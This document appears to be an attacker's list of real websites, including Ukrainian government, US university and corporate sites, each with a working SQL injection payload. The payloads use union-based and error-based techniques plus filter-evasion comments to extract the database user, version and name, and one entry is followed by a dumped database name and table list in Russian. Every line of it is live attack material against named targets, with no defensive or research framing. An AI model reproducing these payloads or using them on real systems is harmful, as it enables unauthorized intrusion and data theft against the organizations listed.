http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--+k

http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html

http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10,11,12,13,14--

http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15--

http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2,3,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info

http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=

http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2

invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+

http://www.mkap.ru/newsview.php?id=1475+and+1=1

http://www.mkap.ru/newsview.php?id=1475+and+1=1

http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+

invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+

База:
invest-expert

Таблицы:
table_article
table_banner
table_coment
table_fotos
table_kategorie
table_menue
table_news
table_produkt
table_projects
table_projects_archive
table_text_blocks
table_texte
table_video 

http://www.uvm.edu/crs/sdc/county_result.php?co_id=4'+and+extractvalue(1,concat(0x3a,(user())))+--+

http://depts.washington.edu/neurolog/psych/archives/viewPres.php?id=708'and+extractvalue(1,concat(0x3a,(user())))+--+

http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,version(),9,10,11,12+--+

http://www.winelabelworld.com/list.php?c=18&w=8+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSION(),+1,+63),+FLOOR(RAND(0)*2)))+--+

https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a)+)+--+;
http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+


